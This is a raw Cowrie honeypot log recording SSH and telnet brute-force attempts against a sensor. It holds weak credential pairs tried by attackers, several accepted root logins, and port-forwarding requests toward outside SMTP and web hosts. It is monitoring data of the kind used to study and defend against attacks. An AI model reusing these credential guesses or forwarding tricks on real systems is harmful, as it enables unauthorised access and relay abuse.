{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T09:38:15.090795Z","src_ip":"206.189.224.163","session":"f49610fd707e"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T09:38:16.209305Z","src_ip":"206.189.224.163","session":"f49610fd707e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:38:16.210829Z","src_ip":"206.189.224.163","session":"f49610fd707e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36514,"dst_ip":"1.2.3.4","dst_port":23,"session":"eabb5be8d0ad","protocol":"telnet","message":"New connection: 212.227.235.229:36514 (1.2.3.4:23) [session: eabb5be8d0ad]","sensor":"my-vps","timestamp":"2025-08-26T09:38:27.361279Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:38:27.549891Z","src_ip":"212.227.235.229","session":"eabb5be8d0ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:38:27.605102Z","src_ip":"212.227.235.229","session":"eabb5be8d0ad"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":33020,"dst_ip":"1.2.3.4","dst_port":22,"session":"efc540ab1012","protocol":"ssh","message":"New connection: 196.251.86.249:33020 (1.2.3.4:22) [session: efc540ab1012]","sensor":"my-vps","timestamp":"2025-08-26T09:38:31.016243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:38:31.508135Z","src_ip":"196.251.86.249","session":"efc540ab1012"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:38:31.508780Z","src_ip":"196.251.86.249","session":"efc540ab1012"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"test123","message":"login attempt [postgres/test123] failed","sensor":"my-vps","timestamp":"2025-08-26T09:38:33.973211Z","src_ip":"196.251.86.249","session":"efc540ab1012"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:38:35.560820Z","src_ip":"196.251.86.249","session":"efc540ab1012"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40324,"dst_ip":"1.2.3.4","dst_port":23,"session":"370fd9c2d576","protocol":"telnet","message":"New connection: 212.227.125.160:40324 (1.2.3.4:23) [session: 370fd9c2d576]","sensor":"my-vps","timestamp":"2025-08-26T09:39:10.856977Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:39:17.838248Z","src_ip":"212.227.125.160","session":"d14abed378a7"}
{"eventid":"cowrie.session.closed","duration":180.14909148216248,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:39:17.843534Z","src_ip":"212.227.125.160","session":"d14abed378a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":23783,"dst_ip":"1.2.3.4","dst_port":22,"session":"8319526825b6","protocol":"ssh","message":"New connection: 212.227.235.229:23783 (1.2.3.4:22) [session: 8319526825b6]","sensor":"my-vps","timestamp":"2025-08-26T09:39:30.523889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T09:39:30.524842Z","src_ip":"212.227.235.229","session":"8319526825b6"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T09:39:30.652644Z","src_ip":"212.227.235.229","session":"8319526825b6"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:39:31.255754Z","src_ip":"212.227.235.229","session":"8319526825b6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-26T09:39:31.385253Z","session":"8319526825b6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-26T09:39:31.514849Z","src_ip":"212.227.235.229","session":"8319526825b6"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:39:31.644739Z","src_ip":"212.227.235.229","session":"8319526825b6"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":34426,"dst_ip":"1.2.3.4","dst_port":22,"session":"731122a99e2b","protocol":"ssh","message":"New connection: 196.251.86.249:34426 (1.2.3.4:22) [session: 731122a99e2b]","sensor":"my-vps","timestamp":"2025-08-26T09:39:36.161809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:39:36.602404Z","src_ip":"196.251.86.249","session":"731122a99e2b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:39:36.603280Z","src_ip":"196.251.86.249","session":"731122a99e2b"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"test321","message":"login attempt [postgres/test321] failed","sensor":"my-vps","timestamp":"2025-08-26T09:39:38.001195Z","src_ip":"196.251.86.249","session":"731122a99e2b"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:39:39.307383Z","src_ip":"196.251.86.249","session":"731122a99e2b"}
{"eventid":"cowrie.session.closed","duration":31.21892499923706,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:39:42.075209Z","src_ip":"212.227.125.160","session":"370fd9c2d576"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":33268,"dst_ip":"1.2.3.4","dst_port":22,"session":"269cd07fc02a","protocol":"ssh","message":"New connection: 196.251.86.249:33268 (1.2.3.4:22) [session: 269cd07fc02a]","sensor":"my-vps","timestamp":"2025-08-26T09:40:40.452294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:40:40.791886Z","src_ip":"196.251.86.249","session":"269cd07fc02a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:40:40.792554Z","src_ip":"196.251.86.249","session":"269cd07fc02a"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"password","message":"login attempt [postgres/password] failed","sensor":"my-vps","timestamp":"2025-08-26T09:40:42.142992Z","src_ip":"196.251.86.249","session":"269cd07fc02a"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:40:43.693694Z","src_ip":"196.251.86.249","session":"269cd07fc02a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64210,"dst_ip":"1.2.3.4","dst_port":22,"session":"29a6e04058ee","protocol":"ssh","message":"New connection: 217.72.205.35:64210 (1.2.3.4:22) [session: 29a6e04058ee]","sensor":"my-vps","timestamp":"2025-08-26T09:41:07.898216Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:41:07.900741Z","src_ip":"217.72.205.35","session":"29a6e04058ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:41:27.623497Z","src_ip":"212.227.235.229","session":"eabb5be8d0ad"}
{"eventid":"cowrie.session.closed","duration":180.2657539844513,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:41:27.626948Z","src_ip":"212.227.235.229","session":"eabb5be8d0ad"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37072,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e5df56c6606","protocol":"ssh","message":"New connection: 196.251.86.249:37072 (1.2.3.4:22) [session: 6e5df56c6606]","sensor":"my-vps","timestamp":"2025-08-26T09:41:42.387325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:41:43.171662Z","src_ip":"196.251.86.249","session":"6e5df56c6606"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:41:43.172382Z","src_ip":"196.251.86.249","session":"6e5df56c6606"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"passwd","message":"login attempt [postgres/passwd] failed","sensor":"my-vps","timestamp":"2025-08-26T09:41:45.235360Z","src_ip":"196.251.86.249","session":"6e5df56c6606"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:41:46.913007Z","src_ip":"196.251.86.249","session":"6e5df56c6606"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38666,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb50629772f0","protocol":"ssh","message":"New connection: 196.251.86.249:38666 (1.2.3.4:22) [session: cb50629772f0]","sensor":"my-vps","timestamp":"2025-08-26T09:42:44.555268Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:42:45.027984Z","src_ip":"196.251.86.249","session":"cb50629772f0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:42:45.028781Z","src_ip":"196.251.86.249","session":"cb50629772f0"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"pass","message":"login attempt [postgres/pass] failed","sensor":"my-vps","timestamp":"2025-08-26T09:42:48.393007Z","src_ip":"196.251.86.249","session":"cb50629772f0"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:42:50.058405Z","src_ip":"196.251.86.249","session":"cb50629772f0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30159,"dst_ip":"1.2.3.4","dst_port":22,"session":"424252c450c7","protocol":"ssh","message":"New connection: 213.209.150.239:30159 (1.2.3.4:22) [session: 424252c450c7]","sensor":"my-vps","timestamp":"2025-08-26T09:42:52.070355Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T09:42:52.071563Z","src_ip":"213.209.150.239","session":"424252c450c7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T09:42:52.119174Z","src_ip":"213.209.150.239","session":"424252c450c7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:42:52.359571Z","src_ip":"213.209.150.239","session":"424252c450c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":10935,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:10935","sensor":"my-vps","timestamp":"2025-08-26T09:42:52.409452Z","session":"424252c450c7"}
